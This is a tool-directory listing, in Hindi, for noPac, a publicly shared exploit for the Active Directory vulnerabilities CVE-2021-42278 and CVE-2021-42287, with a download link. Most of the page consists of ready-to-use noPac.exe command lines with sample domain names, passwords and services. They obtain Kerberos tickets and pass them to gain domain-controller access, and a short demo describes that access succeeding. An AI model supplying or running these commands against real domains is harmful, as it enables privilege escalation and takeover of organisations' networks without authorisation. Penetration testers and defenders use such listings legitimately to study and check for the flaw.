Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
noPac — CVE-2021-42287/CVE-2021-42278 शोषक | Kitploit
उपकरण/GitHubGitHub/trya9ain/nopac
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubtrya9ain/nopac

noPac

CVE-2021-42287/CVE-2021-42278 शोषक

रिपॉजिटरी देखें
1413 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

noPac

यह परियोजना noPac के सिद्धांत सीखने के लिए शुरू की गई थी, cube0x0 की परियोजना के आधार पर कुछ बदलाव किए गए। स्रोत कोड में व्यक्तिगत समझ की टिप्पणियाँ जोड़ी गईं।

  • Scan फीचर हटा दिया गया, मेरी राय में Scan फीचर बहुत कम काम का है।
  • MachineAccountQuota मान की जाँच जोड़ी गई, यदि यह 0 है तो प्रोग्राम बाहर निकल जाता है।
  • कंप्यूटर खाता जोड़ते समय जाँच प्रसंस्करण को अनुकूलित किया गया।
  • TGT का आउटपुट जोड़ा गया।

भेद्यता का विश्लेषण लेख मेरे ब्लॉग पोस्ट पर देखा जा सकता है: noPac 分析

उपयोग की शर्तें

noPac CVE-2021-42278 (sAMAccountName spoofing) और CVE-2021-42287 (KDC को धोखा देना) दो भेद्यताओं का संयुक्त उपयोग है, केवल इन दोनों भेद्यताओं की उपयोग शर्तों को एक साथ पूरा करने पर ही सफलतापूर्वक उपयोग किया जा सकता है।

उपयोग विधि

root@kitploit:~
Examples: Get TGT and ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

Examples: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

अधिक सामान्यतया उपयोग की जाने वाली विधि PTT है:

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

डेमो

noPac का उपयोग करने से पहले DC तक पहुँच नहीं है।

noPac का उपयोग करें।

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

PTT के बाद वर्तमान विंडो में फिर से DC तक पहुँचने पर सफलतापूर्वक पहुँचा जा सकता है।

उपयोग का वातावरण

ध्यान दें कि प्रोग्राम केवल .NET 4.0+ वातावरण वाली मशीनों पर चल सकता है, Windows Server 2012 में डिफ़ॉल्ट रूप से .NET 4.0 होता है, Windows Server 2008 में डिफ़ॉल्ट रूप से .NET 3.5 होता है।

मशीन पर उपलब्ध .NET संस्करण देखें:

root@kitploit:~
dir c:\Windows\Microsoft.NET\Framework64

टूल डाउनलोड करें